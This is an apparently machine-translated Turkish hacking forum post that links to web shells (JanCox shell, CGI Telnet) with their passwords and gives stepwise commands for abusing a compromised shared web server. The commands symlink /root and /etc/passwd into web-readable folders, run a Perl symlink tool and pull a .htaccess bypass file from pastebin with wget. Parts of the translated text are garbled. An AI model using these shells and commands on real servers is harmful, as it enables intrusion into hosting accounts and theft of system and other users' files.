Güncell Konular ;

// On :3 Şubat 2019 Pazar



1. Shell JanCox ( Şifre :  cox ) https://pastebin.com/raw/hd7xTnVc
2. CGI Telnet ( Password 123456 ) https://pastebin.com/raw/zr3Yn6Zi
3. Perl Symlink Method Auto Tool https://pastebin.com/AygbYW39



Gerekli kontrol:
İçerik açılmıştır. Yorum yazdığınız için teşekkürler.valid

1. Sunucu e dir modeli oluşturun * / ev / kullanıcı / public_html / *, hack * / var / www / html *, vb. 2. * / etc / passwd *, eğer öğretmeniniz buradaysa ve daha sonra 3. Destek CGI perl, (CGI Telnet) bir iç sunucu hatası değil 4. komut * "ln -s / root" * hiçbir erişim reddedildi CGI Telnet yükle> git> şifre doldur> cox_sym dizinine taşı (komut * "cd ../ cox_sym" *)> type * "ln -s / root" * eğer yazıyorsa * "ln: sembolik link 'root' yaratılıyor: İzin reddedildi" * olumlu değil 5. Klasörün symlink * (http://www.site.com/cox_sym/root) * açılabilir (yasak değil, iç sunucu hatası değil) 6. Tip baypasını kontrol edin
Kod:

[code]
*"www.site.com/cox_sym/root/etc/passwd"*
[/code]

1. symlink.pl perl dosyasını yükleyin
2. CGI telnetini açın> yükleme sırasında dir symlink.pl dosyasını taşıyın (komut "cd ../-)
3. symlink.pl dosyasını kontrol edin pook (komut * "ls -l" *)
4. symlink.pl dosyasını çalıştırın (komut * "perl symlink.pl" *)
5. Symlink.pl dosyası otomatik olarak kaldırılırsa, bitene kadar bekleyin.

Dir symlink kodunu aç [/ code]

Kahve arkadaşın var mı?

v1 ile v1'in her biri aynıdır, v2 bazen ölü sunucuyu çalıştırır (DOWN)

ters ip u alanında zaman ördek dışarı gelir oh yo bypas moco / etc / passwd, genellikle sunucu bilir

1. CGI Telnet>

komut> "mkdir ../asu"
komut> "cd ../asu"
komut> "ln -s / etc / passwd 0x.txt"
komut> "wget ​​http: //pastebin*.com/raw/fGP7Jqaf -O .htaccess" <- yıldız eksik
2. http://www.site.com/asu/ adresinden bir şeye erişin
3. Her şeyi kopyalayın, passwd.txt dosyasını kaydedin
Orada bir alan görmek için

http://www.site.com/0xsym/root/var/named

// 2010- B0RU70 Se☪uЯity - Hacklink Al , B0RU70 \\